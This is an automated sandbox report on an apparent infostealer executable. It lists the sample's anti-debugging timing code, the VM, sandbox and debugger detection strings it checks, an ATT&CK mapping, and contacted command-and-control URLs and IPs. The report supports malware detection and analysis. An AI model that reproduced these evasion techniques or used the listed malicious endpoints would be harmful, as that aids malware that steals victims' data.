Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121650 second address: 7121654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121654 second address: 7121667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121667 second address: 7121694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F951A9EBDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170C08 second address: 7170C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170C0C second address: 7170C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170C12 second address: 7170C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 pushfd 0x00000006 jmp 00007F6F946E7E3Dh 0x0000000b add esi, 2D216946h 0x00000011 jmp 00007F6F946E7E41h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F6F946E7E3Eh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6F946E7E3Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170C60 second address: 7170CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EC1h 0x00000009 adc esi, 3E84CC06h 0x0000000f jmp 00007F6F951A9EC1h 0x00000014 popfd 0x00000015 mov ah, 0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F6F951A9EC3h 0x00000020 mov ebp, esp 0x00000022 jmp 00007F6F951A9EC6h 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170CC5 second address: 7170CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170CC9 second address: 7170CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170CCD second address: 7170CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7170CD3 second address: 7170CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71100F1 second address: 711013D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6F946E7E3Eh 0x0000000f push eax 0x00000010 jmp 00007F6F946E7E3Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6F946E7E45h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 711013D second address: 7110143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7110143 second address: 7110147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70B0016 second address: 70B0028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EBEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70B0028 second address: 70B002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70B0A21 second address: 70B0A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71008A6 second address: 71008F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F946E7E47h 0x00000009 xor cx, 3E3Eh 0x0000000e jmp 00007F6F946E7E49h 0x00000013 popfd 0x00000014 mov esi, 458CB587h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edx, ax 0x00000024 mov esi, 5C280E77h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71008F6 second address: 71008FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E001F second address: 70E0023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E0023 second address: 70E0029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E0029 second address: 70E0053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F946E7E47h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E0053 second address: 70E006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E006B second address: 70E009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6F946E7E49h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E009D second address: 70E00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E00A1 second address: 70E00A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E00A5 second address: 70E00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E01CC second address: 70E01D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E01D1 second address: 70E0231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F6F951A9EC6h 0x00000011 xchg eax, edi 0x00000012 jmp 00007F6F951A9EC0h 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6F951A9EC7h 0x00000020 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\wlEp68Few5.exeSpecial instruction interceptor: First address: A8DBAA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exeSpecial instruction interceptor: First address: C378D4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exeSpecial instruction interceptor: First address: C61866 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exeSpecial instruction interceptor: First address: A8DAC5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exeSpecial instruction interceptor: First address: C3FB38 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00659980 rdtsc 0_2_00659980
Source: C:\Users\user\Desktop\wlEp68Few5.exe TID: 3440Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0047255D
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004729FF
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0047255D
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: wlEp68Few5.exe, 00000000.00000003.1410063704.0000000006981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#a
Source: wlEp68Few5.exeBinary or memory string: Hyper-V RAW
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: wlEp68Few5.exe, 00000000.00000003.1455516008.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455056831.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1461182211.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1454984926.00000000017E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\wlEp68Few5.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_070F06CC Start: 070F08CB End: 070F06DB0_2_070F06CC
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\wlEp68Few5.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile opened: NTICE
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile opened: SICE
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\wlEp68Few5.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00659980 rdtsc 0_2_00659980
Source: wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oRD%$Program Manager
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: RD%$Program Manager
Source: C:\Users\user\Desktop\wlEp68Few5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 194.87.47.113:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
wlEp68Few5.exe47%VirustotalBrowse
wlEp68Few5.exe45%ReversingLabsWin32.Infostealer.Tinba
wlEp68Few5.exe100%AviraTR/Crypt.TPM.Gen
wlEp68Few5.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=100%Avira URL Cloudmalware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963100%Avira URL Cloudmalware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1100%Avira URL Cloudmalware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
194.87.47.113
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlwlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdwlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#wlEp68Few5.exefalse
                		high
                https://httpbin.org/ipbeforewlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://curl.se/docs/http-cookies.htmlwlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1455516008.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455056831.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1461182211.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1454984926.00000000017E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/hsts.html#wlEp68Few5.exefalse
                      		high
                      https://curl.se/docs/http-cookies.html#wlEp68Few5.exefalse
                        		high
                        https://curl.se/docs/alt-svc.htmlwlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://.csswlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://.jpgwlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFwlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                98.85.100.80
                                		httpbin.orgUnited States
                                		11351TWC-11351-NORTHEASTUSfalse
                                194.87.47.113
                                		home.twentytk20pn.topRussian Federation
                                		49392ASBAXETNRUfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1578070
                                Start date and time:2024-12-19 08:32:30 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 59s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:wlEp68Few5.exe
                                renamed because original name is a hash value
                                Original Sample Name:8cd346fc831e7d59ebab0de045018b84.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 51%
                                • Number of executed functions: 92
                                • Number of non-executed functions: 50
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                02:33:32API Interceptor3x Sleep call for process: wlEp68Few5.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                98.85.100.80Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                  rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          f1842FwKth.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    194.87.47.113rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgSh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 98.85.100.80
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
